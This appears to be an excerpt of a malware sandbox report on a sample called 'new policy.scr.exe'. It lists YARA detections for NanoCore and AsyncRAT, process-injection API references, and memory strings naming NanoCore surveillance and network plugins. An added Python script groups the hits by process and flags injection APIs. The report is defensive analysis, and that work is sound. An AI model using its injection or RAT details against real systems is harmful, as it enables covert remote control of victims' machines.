Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 7180, type: MEMORYSTR Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Networks!.exe PID: 5868, type: MEMORYSTR Matched rule: detect Nanocore in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Networks!.exe PID: 3720, type: MEMORYSTR Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5FBD0 NtResumeThread, 0_2_05D5FBD0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5E6E0 NtProtectVirtualMemory, 0_2_05D5E6E0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5FBC8 NtResumeThread, 0_2_05D5FBC8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5E6DB NtProtectVirtualMemory, 0_2_05D5E6DB
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9FBD0 NtResumeThread, 6_2_05D9FBD0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9E6E0 NtProtectVirtualMemory, 6_2_05D9E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9FBC8 NtResumeThread, 6_2_05D9FBC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9E6DB NtProtectVirtualMemory, 6_2_05D9E6DB
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594FBD0 NtResumeThread, 7_2_0594FBD0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594E6E0 NtProtectVirtualMemory, 7_2_0594E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594FBC8 NtResumeThread, 7_2_0594FBC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594E6D9 NtProtectVirtualMemory, 7_2_0594E6D9
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_013D6BC8 0_2_013D6BC8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_013DB178 0_2_013DB178
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_013D6BB8 0_2_013D6BB8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_013D7638 0_2_013D7638
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_053505F8 0_2_053505F8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_053505E8 0_2_053505E8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E7C48 0_2_059E7C48
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E0040 0_2_059E0040
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E6E88 0_2_059E6E88
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E0006 0_2_059E0006
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E7C38 0_2_059E7C38
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E8048 0_2_059E8048
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E6710 0_2_059E6710
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E6720 0_2_059E6720
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E1290 0_2_059E1290
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E12A0 0_2_059E12A0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_059E8200 0_2_059E8200
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05BF2CF1 0_2_05BF2CF1
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05BF3087 0_2_05BF3087
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05BF4368 0_2_05BF4368
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5B928 0_2_05D5B928
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D598B0 0_2_05D598B0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5E458 0_2_05D5E458
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D52EB8 0_2_05D52EB8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5B918 0_2_05D5B918
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D598A0 0_2_05D598A0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5E44B 0_2_05D5E44B
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D59C03 0_2_05D59C03
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5AE10 0_2_05D5AE10
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5AE00 0_2_05D5AE00
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05E7EFA0 0_2_05E7EFA0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05E7FB00 0_2_05E7FB00
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05E7D088 0_2_05E7D088
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05E60040 0_2_05E60040
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05E60006 0_2_05E60006
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Code function: 2_2_00007FFD9BAC6D69 2_2_00007FFD9BAC6D69
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe Code function: 2_2_00007FFD9BAC5FB9 2_2_00007FFD9BAC5FB9
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588E5D8 3_2_0588E5D8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_05883471 3_2_05883471
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588DE00 3_2_0588DE00
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588F1F0 3_2_0588F1F0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588B098 3_2_0588B098
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588B0A8 3_2_0588B0A8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0588FAD0 3_2_0588FAD0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_077554B8 3_2_077554B8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0775E3F8 3_2_0775E3F8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0775DB28 3_2_0775DB28
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_07755A00 3_2_07755A00
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_07759850 3_2_07759850
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0775D7E0 3_2_0775D7E0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0775A526 3_2_0775A526
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0775A468 3_2_0775A468
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_077554A8 3_2_077554A8
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_077559F1 3_2_077559F1
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 3_2_0775E8F8 3_2_0775E8F8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B26BC8 6_2_02B26BC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B2B178 6_2_02B2B178
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B26BBF 6_2_02B26BBF
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B2765B 6_2_02B2765B
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B59EF0 6_2_02B59EF0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B5E707 6_2_02B5E707
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B56A10 6_2_02B56A10
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B5E9E5 6_2_02B5E9E5
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B59EE1 6_2_02B59EE1
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B5ECB0 6_2_02B5ECB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_02B5ECAE 6_2_02B5ECAE
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A20040 6_2_05A20040
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A27C48 6_2_05A27C48
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A26E88 6_2_05A26E88
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A2003B 6_2_05A2003B
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A27C38 6_2_05A27C38
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A26720 6_2_05A26720
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A26710 6_2_05A26710
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A212A0 6_2_05A212A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A21290 6_2_05A21290
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05A28200 6_2_05A28200
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05C32D50 6_2_05C32D50
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05C33087 6_2_05C33087
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05C34368 6_2_05C34368
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9B928 6_2_05D9B928
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D998B0 6_2_05D998B0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9E458 6_2_05D9E458
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D92EB8 6_2_05D92EB8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9B918 6_2_05D9B918
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D998A0 6_2_05D998A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9E44B 6_2_05D9E44B
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D99C03 6_2_05D99C03
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9AE10 6_2_05D9AE10
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05D9AE00 6_2_05D9AE00
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05EBEFA0 6_2_05EBEFA0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05EBFB00 6_2_05EBFB00
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05EBD088 6_2_05EBD088
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05EA0040 6_2_05EA0040
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 6_2_05EA0021 6_2_05EA0021
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00DF6BC8 7_2_00DF6BC8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00DFB178 7_2_00DFB178
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00DF6BB8 7_2_00DF6BB8
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00DF735D 7_2_00DF735D
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F19EF0 7_2_00F19EF0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F1E707 7_2_00F1E707
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F1E9E5 7_2_00F1E9E5
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F16A10 7_2_00F16A10
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F1ECB0 7_2_00F1ECB0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F1ECAF 7_2_00F1ECAF
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_00F19EE1 7_2_00F19EE1
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D7C48 7_2_055D7C48
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D0040 7_2_055D0040
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D6E88 7_2_055D6E88
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D0006 7_2_055D0006
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D7C38 7_2_055D7C38
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D6710 7_2_055D6710
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D6720 7_2_055D6720
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D8200 7_2_055D8200
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D1290 7_2_055D1290
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_055D12A0 7_2_055D12A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057E4368 7_2_057E4368
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057E2CF1 7_2_057E2CF1
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057E0F1A 7_2_057E0F1A
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057EB5AF 7_2_057EB5AF
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_057E3087 7_2_057E3087
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594B928 7_2_0594B928
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_059498B0 7_2_059498B0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594E458 7_2_0594E458
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594B918 7_2_0594B918
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_059498A0 7_2_059498A0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05949C03 7_2_05949C03
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594304A 7_2_0594304A
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594E44A 7_2_0594E44A
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594AE10 7_2_0594AE10
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594AE00 7_2_0594AE00
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05A6EFA0 7_2_05A6EFA0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05A6FB00 7_2_05A6FB00
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05A6D088 7_2_05A6D088
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05A50007 7_2_05A50007
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_05A50040 7_2_05A50040
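The Yara and "Code function" lines above are raw signature output. What an analyst wants from them is a per-process view: which process indices carry hits for which family, and which processes reference the native calls (NtProtectVirtualMemory, NtResumeThread) that the report ties to PE injection into foreign processes. The Python below is an added example written for this page, not Joe Sandbox code. It assumes only that a dump name starts with <process index>.<dump index>.<id>.<base address> (the "3.2.new policy.scr.exe...unpack" names later in the report use the same <process>.<dump> prefix) and that "Code function" lines carry <process>_<dump>_<address>; the sample lines are copied from this section. The family mapping keeps unknown rule names verbatim because a rule name is a hint, not a verdict: the "Detects AsyncRAT" hit lands on dump 0.2 at base 0x322A000, the same region in which the memory-string list below shows OriginalFilenameXClient.exe, which fits the XWorm verdict in the report summary rather than AsyncRAT.

```python
import json
import re
from collections import defaultdict

# Constructed sample: a handful of lines copied from this report section.
SAMPLE_LINES = r"""
Source: 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.2271006345.0000000000702000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Nanocore_d8c4e3c5 Author: unknown
Source: Process Memory Space: Networks!.exe PID: 8108, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: C:\Users\user\AppData\Local\Temp\airlineagancy.casacam.net 7076.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5FBD0 NtResumeThread, 0_2_05D5FBD0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_05D5E6E0 NtProtectVirtualMemory, 0_2_05D5E6E0
Source: C:\Users\user\AppData\Roaming\Networks!.exe Code function: 7_2_0594E6E0 NtProtectVirtualMemory, 7_2_0594E6E0
Source: C:\Users\user\Desktop\new policy.scr.exe Code function: 0_2_013D6BC8 0_2_013D6BC8
"""

HEX8, HEX16 = r"[0-9A-Fa-f]{8}", r"[0-9A-Fa-f]{16}"
PATTERNS = [
    # Yara hit in a memory dump; the dump name starts <process index>.<dump index>.<id>.<base address>.
    ("yara_dump", re.compile(
        r"^Source: (?P<proc>" + HEX8 + r")\." + HEX8 + r"\.\d+\.(?P<base>" + HEX16 + r")\.[0-9A-Fa-f.]+\.sdmp, "
        r"type: MEMORY Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$")),
    # Yara hit on the string dump of a live process (keyed by PID, not by process index).
    ("yara_memstr", re.compile(
        r"^Source: Process Memory Space: (?P<image>.+?) PID: (?P<pid>\d+), "
        r"type: MEMORYSTR Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$")),
    # Yara hit on a dropped file.
    ("yara_dropped", re.compile(
        r"^Source: (?P<path>.+?), type: DROPPED Matched rule: (?P<rule>.+?) Author: (?P<author>.+)$")),
    # Code function: <process>_<dump>_<address>, optionally followed by a resolved native API name.
    ("code_function", re.compile(
        r"^Source: (?P<path>.+?) Code function: (?P<proc>\d+)_\d+_(?P<addr>[0-9A-Fa-f]+)"
        r"(?: (?P<api>\w+),)? \d+_\d+_[0-9A-Fa-f]+$")),
]

# Rule-name fragments mapped to a family label; anything else keeps the raw rule name.
FAMILY_HINTS = (("nanocore", "NanoCore"), ("asyncrat", "AsyncRAT"), ("xworm", "XWorm"))

# Native calls commonly used for injection; two or more in one process raises the flag.
INJECTION_APIS = {"NtProtectVirtualMemory", "NtResumeThread", "NtWriteVirtualMemory",
                  "NtUnmapViewOfSection", "NtCreateThreadEx", "NtQueueApcThread"}


def family_of(rule):
    low = rule.lower()
    for needle, label in FAMILY_HINTS:
        if needle in low:
            return label
    return rule


def parse_report(text):
    """Turn report lines into records; lines that match no pattern are ignored."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        for kind, rx in PATTERNS:
            m = rx.match(line)
            if m:
                records.append({"kind": kind, **m.groupdict()})
                break
    return records


def summarize(records):
    """Group hits per subject: process index, live PID, or dropped file."""
    acc = defaultdict(lambda: {"families": set(), "native_apis": set(), "regions": set()})
    for r in records:
        if r["kind"] == "yara_dump":
            entry = acc["process %d" % int(r["proc"], 16)]
            entry["families"].add(family_of(r["rule"]))
            entry["regions"].add(int(r["base"], 16))
        elif r["kind"] == "yara_memstr":
            acc["pid %s %s" % (r["pid"], r["image"])]["families"].add(family_of(r["rule"]))
        elif r["kind"] == "yara_dropped":
            acc["dropped " + r["path"].rsplit("\\", 1)[-1]]["families"].add(family_of(r["rule"]))
        elif r["kind"] == "code_function":
            entry = acc["process %d" % int(r["proc"])]  # registers the process even with no API
            if r["api"]:
                entry["native_apis"].add(r["api"])
    out = {}
    for key, v in acc.items():
        apis = sorted(v["native_apis"])
        out[key] = {
            "families": sorted(v["families"]),
            "native_apis": apis,
            "regions": ["0x%X" % b for b in sorted(v["regions"])],
            "injection_primitives": len(INJECTION_APIS.intersection(apis)) >= 2,
        }
    return out


if __name__ == "__main__":
    print(json.dumps(summarize(parse_report(SAMPLE_LINES)), indent=2))
```

Run on the full section, the summary shows the pattern a reader has to dig out by hand here: process 3 and the Networks!.exe PIDs carry only NanoCore hits, process 0 (the submitted sample) carries the AsyncRAT-named hit plus both NtProtectVirtualMemory and NtResumeThread, and the dropped airlineagancy.casacam.net 7076.exe matches the AsyncRAT rule on disk.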
Source: C:\Users\user\Desktop\new policy.scr.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7784 -s 1336
Source: new policy.scr.exe, 00000000.00000002.1883536648.0000000005510000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E21000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.000000000438C000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000004E6B000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCpshapibpvz.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.00000000049E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1877031081.0000000003F81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1885309360.0000000005B90000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameprotobuf-net.dllJ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.000000000322A000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameXClient.exe4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000003260000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1869683888.0000000002F81000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilename vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1883175138.00000000052F0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000002.1862029930.0000000000DCE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000000.00000000.1641044218.0000000000992000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameOwjefxd.exe0 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867271024.0000000007760000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameAForge.Video.DirectShow.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNAudio.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSurveillanceClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.00000000044EE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCoreClientPlugin.dll" vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameManagementClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNanoCoreBase.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPluginNew.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameFileBrowserClient.dllT vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNanoCoreStressTester.dll< vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSecurityClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2835253359.0000000003201000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameToolsClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2852023359.0000000004268000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSurveillanceExClientPlugin.dll4 vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2867912424.00000000077B0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameMyClientPlugin.dll@ vs new policy.scr.exe
Source: new policy.scr.exe, 00000003.00000002.2868662775.0000000007920000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameNetworkClientPlugin.dll4 vs new policy.scr.exe
